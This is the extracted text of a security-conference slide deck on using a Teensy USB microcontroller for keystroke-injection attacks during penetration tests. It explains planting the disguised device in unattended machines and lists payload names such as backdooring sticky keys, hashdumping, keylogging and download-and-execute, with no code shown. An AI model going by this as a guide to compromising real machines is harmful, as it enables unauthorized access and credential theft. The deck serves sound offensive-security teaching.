MERE PAAS TEENSY HAI

OR

COMPROMISING A HIGHLY SECURE

ENVIRONMENT PART 2

Nikhil Mittal (SamratAshok)

ABOUT ME

SamratAshok

Twitter - @nikhil_mitt

Penetration Tester with PwC India

I am interested in Offensive Information Security, new attack vectors and methodologies to pwn systems.

Creator of Kautilya and Maareech

Previous Talks

Ultimate Pen Testing: Compromising a highly secure environment Clubhack’10

Here are your Keystrokes Hackfest’11

Upcoming Talks

Kautilya: Teensy beyond shell Blackhat Abu Dhabi’11

OVERVIEW

Why the Title?

Current State of Pentesting

Questions being raised to us

The answer to the questions

What’s done

What we will do

Limitations

Future

Conclusion

WHY THE TITLE?

What I Told to the ClubHack team:

I talked about compromising a highly secure

environment last year, let’s continue with the pwnage!!

Thanks to the team for buying that and allowing me to

speak.

The real reason:

A TYPICAL PEN TEST SCENARIO

A client engagement comes with IP addresses.

We need to complete the assignment in very

restrictive time frame.

Pressure is on us to deliver a “good” report with

some high severity findings. (That “High” return

inside a red colored box)

CURRENT STATE OF PENTESTING

Vuln Scan

Exploit Report

This is a best case scenario.

Only lucky ones find that.

Generally legacy Enterprise Applications or

Business Critical applications are not upgraded.

There is almost no fun doing it that way.

SOME OF US DO IT BETTER

Enum Scan Exploit Report

SOME OF US DO IT EVEN BETTER

Enum

+

Intel

Scan Exploit Post Exp

Report

WHY DO WE NEED TO EXPLOIT?

To gain access to the systems.

This shows the real threat to clients that we can

actually make an impact on their business. No more

“so-what”

We can create reports with “High” Severity findings.

<Audience>

<Audience>

WHAT DO WE EXPLOIT?

Memory Corruption bugs.

Server side

Client Side

Humans

Mis-configurations

Design Problems

<Audience>

<Audience>

QUESTIONS BEING RAISED TO US

Many times we get some vulnerabilities but can’t

exploit.

No public exploits available.

Not allowed on the system.

Countermeasure blocking it.

Exploit completed but no session was generated :P

Kya hai tumhare

paas?

QUESTIONS BEING RAISED TO US

Hardened Systems

Patches in place

Countermeasures blocking scans and exploits

Security incident monitoring and blocking

Kya hai tumhare

paas?

QUESTIONS BEING RAISED TO US

Just a bad day.

Exploit completed but no session was generated :P

Kya hai tumhare

paas?

ALTERNATIVES

Open file shares.

Sticky slips.

Social Engineering attacks.

Man In The Middle (many types)

SMB Relay

<Audience>

<Audience>

THE ANSWER TO THE QUESTIONS

TEENSY

A USB Micro-controller device.

We will use Teensy ++ which is a newer version of

Teensy.

Available for $24 from pjrc.com

Mere paas Teensy hai

USING TEENSY

Find an unattended system and insert the teensy

device in USB port.

Fool your victim by disguising it as a mouse, USB

toy, Thumb drive etc.

Generally Teensy needs just a minute to complete

the job.

You can program it according to your needs.

Undetected and unblocked, Teensy works great for

popping shells.

WHAT’S DONE

Arduino-Based attack vector in Social Engineering

Toolkit by David Kennedy

Contains some really awesome payloads.

Almost all payloads are for popping shells.

WHAT WE WILL DO

Teensy can be used for much more than popping

shells.

It can be used to perform pre and post exploitation.

We will have a detailed look at some of these

payloads and will understand how to create

payloads as per our needs.

DESCRIPTION OF PAYLOADS

More for Windows as desktops are generally based

on Windows.

Payloads vary from one line commands to powerful

scripts.

If you know powershell scripting, payloads will

make more sense and will be easier to customize.

DEMO

WINDOWS USER ADD

THANK YOU

DEFAULT DNS

EDIT HOSTS FILE

ENABLE RDP

BUT

What if even Teensy doesn’t work? With other

options not working already?

If USB ports are ripped off?

Would it be impossible to pwn such environment?

ENABLE TELNET

FORCEFUL BROWSING

DOWNLOAD AND EXECUTE

SETHC AND UTILMAN BACKDOOR

UNINSTALL APPLICATION

REGISTRY EXPORT

TWEET

HASHDUMP

CODE EXECUTION

KEYLOGGING

LIMITATIONS

Limited storage in Teensy. Resolved if you attach a

SD card with Teensy.

Inability to “read” from the system. You have to

assume the responses of victim OS and there is

only one way traffic.

FUTURE

Kautilya

Improvement in current payloads.

New payloads for non-traditional shells.

Dropping executables using additional storage

(already done).

CONCLUSION

If used wisely Teensy can be used as a complete

penetration testing device though with its own

limitations.

It’s a cheap device so use it.

Please use Kautilya and give feedback after it is

released.

Mere paas Teensy hai

THANK YOU

Questions?

Insults?

Feedback?